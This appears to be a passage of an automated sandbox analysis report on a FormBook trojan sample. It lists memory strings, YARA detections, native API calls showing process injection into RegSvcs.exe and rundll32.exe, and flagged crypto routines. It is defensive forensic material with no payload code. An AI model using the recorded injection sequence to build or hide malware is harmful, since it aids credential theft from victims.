Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Windows\explorer.exe	Code function: 9_2_0E396232 NtCreateFile,	9_2_0E396232
Source: C:\Windows\explorer.exe	Code function: 9_2_0E397E12 NtProtectVirtualMemory,	9_2_0E397E12
Source: C:\Windows\explorer.exe	Code function: 9_2_0E397E0A NtProtectVirtualMemory,	9_2_0E397E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A370 NtCreateFile,	13_2_0041A370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A420 NtReadFile,	13_2_0041A420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A4A0 NtClose,	13_2_0041A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A550 NtAllocateVirtualMemory,	13_2_0041A550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A41C NtReadFile,	13_2_0041A41C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A49A NtClose,	13_2_0041A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282B60 NtClose,LdrInitializeThunk,	13_2_01282B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_01282BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AD0 NtReadFile,LdrInitializeThunk,	13_2_01282AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_01282D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_01282D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_01282DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DD0 NtDelayExecution,LdrInitializeThunk,	13_2_01282DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_01282C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_01282CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F30 NtCreateSection,LdrInitializeThunk,	13_2_01282F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FB0 NtResumeThread,LdrInitializeThunk,	13_2_01282FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F90 NtProtectVirtualMemory,LdrInitializeThunk,	13_2_01282F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FE0 NtCreateFile,LdrInitializeThunk,	13_2_01282FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_01282EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_01282E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01284340 NtSetContextThread,	13_2_01284340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01284650 NtSuspendThread,	13_2_01284650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BA0 NtEnumerateValueKey,	13_2_01282BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282B80 NtQueryInformationFile,	13_2_01282B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282BE0 NtQueryValueKey,	13_2_01282BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AB0 NtWaitForSingleObject,	13_2_01282AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282AF0 NtWriteFile,	13_2_01282AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282D00 NtSetInformationFile,	13_2_01282D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282DB0 NtEnumerateKey,	13_2_01282DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C00 NtQueryInformationProcess,	13_2_01282C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282C60 NtCreateKey,	13_2_01282C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CF0 NtOpenProcess,	13_2_01282CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282CC0 NtQueryVirtualMemory,	13_2_01282CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282F60 NtCreateProcessEx,	13_2_01282F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282FA0 NtQuerySection,	13_2_01282FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282E30 NtWriteVirtualMemory,	13_2_01282E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282EE0 NtQueueApcThread,	13_2_01282EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283010 NtOpenDirectoryObject,	13_2_01283010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283090 NtSetValueKey,	13_2_01283090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012835C0 NtCreateMutant,	13_2_012835C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012839B0 NtGetContextThread,	13_2_012839B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283D10 NtOpenProcessToken,	13_2_01283D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01283D70 NtOpenThread,	13_2_01283D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00725CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	15_2_00725CF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_007240B1 NtQuerySystemInformation,	15_2_007240B1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00725D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	15_2_00725D6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00724136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_04C82CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C60 NtCreateKey,LdrInitializeThunk,	15_2_04C82C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_04C82C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DD0 NtDelayExecution,LdrInitializeThunk,	15_2_04C82DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_04C82DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_04C82D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_04C82EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FE0 NtCreateFile,LdrInitializeThunk,	15_2_04C82FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F30 NtCreateSection,LdrInitializeThunk,	15_2_04C82F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AD0 NtReadFile,LdrInitializeThunk,	15_2_04C82AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BE0 NtQueryValueKey,LdrInitializeThunk,	15_2_04C82BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_04C82BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82B60 NtClose,LdrInitializeThunk,	15_2_04C82B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C835C0 NtCreateMutant,LdrInitializeThunk,	15_2_04C835C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C84650 NtSuspendThread,	15_2_04C84650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C84340 NtSetContextThread,	15_2_04C84340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CC0 NtQueryVirtualMemory,	15_2_04C82CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82CF0 NtOpenProcess,	15_2_04C82CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82C00 NtQueryInformationProcess,	15_2_04C82C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82DB0 NtEnumerateKey,	15_2_04C82DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D00 NtSetInformationFile,	15_2_04C82D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82D30 NtUnmapViewOfSection,	15_2_04C82D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82EE0 NtQueueApcThread,	15_2_04C82EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82E80 NtReadVirtualMemory,	15_2_04C82E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82E30 NtWriteVirtualMemory,	15_2_04C82E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F90 NtProtectVirtualMemory,	15_2_04C82F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FA0 NtQuerySection,	15_2_04C82FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82FB0 NtResumeThread,	15_2_04C82FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82F60 NtCreateProcessEx,	15_2_04C82F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AF0 NtWriteFile,	15_2_04C82AF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82AB0 NtWaitForSingleObject,	15_2_04C82AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82B80 NtQueryInformationFile,	15_2_04C82B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C82BA0 NtEnumerateValueKey,	15_2_04C82BA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83090 NtSetValueKey,	15_2_04C83090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83010 NtOpenDirectoryObject,	15_2_04C83010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83D70 NtOpenThread,	15_2_04C83D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C83D10 NtOpenProcessToken,	15_2_04C83D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C839B0 NtGetContextThread,	15_2_04C839B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A370 NtCreateFile,	15_2_02B6A370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A4A0 NtClose,	15_2_02B6A4A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A420 NtReadFile,	15_2_02B6A420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A550 NtAllocateVirtualMemory,	15_2_02B6A550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A49A NtClose,	15_2_02B6A49A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_02B6A41C NtReadFile,	15_2_02B6A41C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	15_2_04AA9BAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AAA042 NtQueryInformationProcess,	15_2_04AAA042
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04AA9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	15_2_04AA9BB2

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_02B6D5DC	0_2_02B6D5DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309668	0_2_07309668
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309658	0_2_07309658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07300400	0_2_07300400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_073003F0	0_2_073003F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07307E60	0_2_07307E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309ED8	0_2_07309ED8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07307A28	0_2_07307A28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309AA0	0_2_07309AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_07309A90	0_2_07309A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 0_2_0BEF1118	0_2_0BEF1118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130100	7_2_01130100
